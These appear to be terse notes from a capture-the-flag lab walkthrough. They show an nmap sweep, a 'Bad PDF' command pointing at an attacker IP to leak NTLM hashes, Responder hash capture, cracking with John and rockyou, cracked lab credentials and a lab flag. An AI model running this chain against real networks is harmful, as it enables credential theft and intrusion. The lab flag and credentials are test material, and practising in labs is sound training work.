Scanning

nmap 10.10.110.0/24 --min-rate 1000

Checking the website

Bad PDF Exploit!

python3 badpdf.py test.pdf "10.10.17.147"

Responder to get hash

sudo responder -I tun0

Cracking

john crackme.txt --wordlist=/usr/share/wordlists/rockyou.txt

Got username

username: PAINTERS\\riley
password: P@ssw0rd

Riley have ssh access on MAIL server

we got flag in riley home directory

ZEPHYR{HuM4n_3rr0r_1s_0uR_D0wnf4ll}